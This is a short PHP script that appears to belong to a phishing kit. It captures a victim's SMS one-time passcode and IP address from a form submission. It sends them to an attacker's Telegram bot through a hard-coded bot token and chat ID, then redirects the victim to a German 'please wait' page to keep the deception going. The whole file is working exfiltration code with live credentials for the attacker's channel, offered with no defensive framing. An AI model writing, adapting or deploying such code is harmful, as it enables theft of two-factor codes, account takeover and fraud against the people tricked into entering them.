<?php
$ip = getenv("REMOTE_ADDR");
$smsCode = $_POST['SMS'] ?? '';


$message  = "🔐 <b>OTP SMS Code</b>\n";
$message .= "=====================\n";
$message .= "📩 Code: <code>$smsCode</code>\n";
$message .= "🌍 IP: <code>$ip</code>\n";
$message .= "=====================";


file_get_contents("https://api.telegram.org/bot8230036797:AAEn7vvHrk5SF628aV7IfxBm2dujlmF-tPo/sendMessage?chat_id=-4857187582&parse_mode=HTML&text=" . urlencode($message));


header("Location: ../Bitte/Warten-2.php");
exit;
?>
